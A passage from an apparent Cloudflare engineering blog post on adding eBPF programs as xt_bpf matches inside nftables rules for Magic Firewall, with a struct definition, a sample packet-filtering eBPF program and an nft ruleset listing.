		NFTA_MATCH_NAME "bpf"
		NFTA_MATCH_REV 1
		NFTA_MATCH_INFO ebpf_bytes	

The structure of the netlink/netfilter message to add an eBPF match should look like the above example. Of course, this message needs to be properly embedded and include a conditional step, such as a verdict, when there is a match. The next step was decoding the format of `ebpf_bytes` as shown in the example below.

struct xt_bpf_info_v1 {
	__u16 mode;
	__u16 bpf_program_num_elem;
	__s32 fd;
	union {
		struct sock_filter bpf_program[XT_BPF_MAX_NUM_INSTR];
		char path[XT_BPF_PATH_MAX];
	};
};

The bytes format can be found in the kernel header definition of struct xt_bpf_info_v1. The code example above shows the relevant parts of the structure.

The xt_bpf module supports both raw bytecode and a path to a pinned eBPF program. The latter mode is the technique we used to combine the eBPF program with nftables.

With this information we were able to write code that could create netlink messages and properly serialize any relevant data fields. This approach was just the first step; we are also looking into incorporating this into proper tooling instead of sending custom netfilter messages.

Just Add eBPF

Now we needed to construct an eBPF program and load it into an existing nftables table and chain. Starting to use eBPF can be a bit daunting. Which program type do we want to use? How do we compile and load our eBPF program? We started this process by doing some exploration and research.

First we constructed an example program to try it out.

/* Includes added here for completeness; built with clang -O2 -target bpf
 * (header paths may vary by distribution). */
#include <linux/bpf.h>
#include <linux/ip.h>
#include <bpf/bpf_helpers.h>
#include <bpf/bpf_endian.h>

SEC("socket")
int filter(struct __sk_buff *skb) {
  /* get header */
  struct iphdr iph;
  if (bpf_skb_load_bytes(skb, 0, &iph, sizeof(iph))) {
    return BPF_DROP;
  }

  /* read last 5 bytes in payload of udp */
  __u16 pkt_len = bpf_ntohs(iph.tot_len); /* tot_len is big-endian on the wire */
  char data[5];
  if (bpf_skb_load_bytes(skb, pkt_len - sizeof(data), &data, sizeof(data))) {
    return BPF_DROP;
  }

  /* only packets with the magic word at the end of the payload are allowed */
  const char SECRET_TOKEN[5] = "xyzzy";
  for (int i = 0; i < sizeof(SECRET_TOKEN); i++) {
    if (SECRET_TOKEN[i] != data[i]) {
      return BPF_DROP;
    }
  }

  return BPF_OK;
}

The excerpt above is an example of an eBPF program that only accepts packets that have a magic string at the end of the payload. This requires checking the total length of the packet to find where to start the search. For clarity, this example omits error checking and headers.

Once we had a program, the next step was integrating it into our tooling. We tried a few technologies to load the program, such as BCC and libbpf, and we even created a custom loader. Ultimately, we ended up using cilium’s ebpf library, since our control-plane program is written in Go and the library makes it easy to generate, embed, and load eBPF programs.

# nft list ruleset
table ip mfw {
	chain input {
		#match bpf pinned /sys/fs/bpf/mfw/match drop
	}
}

Once the program is compiled and pinned, we can add matches into nftables using netlink commands. Listing the ruleset shows the match is present. This is incredible! We are now able to deploy custom C programs to provide advanced matching inside a Magic Firewall ruleset!

More Magic

With the addition of eBPF to our toolkit, Magic Firewall is an even more flexible and powerful way to protect your network from bad actors. We are now able to look deeper into packets and implement more complex matching logic than nftables alone could provide. Since our firewall is running as software on all Cloudflare servers, we can quickly iterate and update features.

One outcome of this project is SIP protection, which is currently in beta. That’s only the beginning. We are currently exploring the use of eBPF for protocol validation, advanced field matching, payload inspection, and support for even larger sets of IP lists.

We welcome your help here, too! If you have other use cases and ideas, please talk to your account team. If you find this technology interesting, come join our team!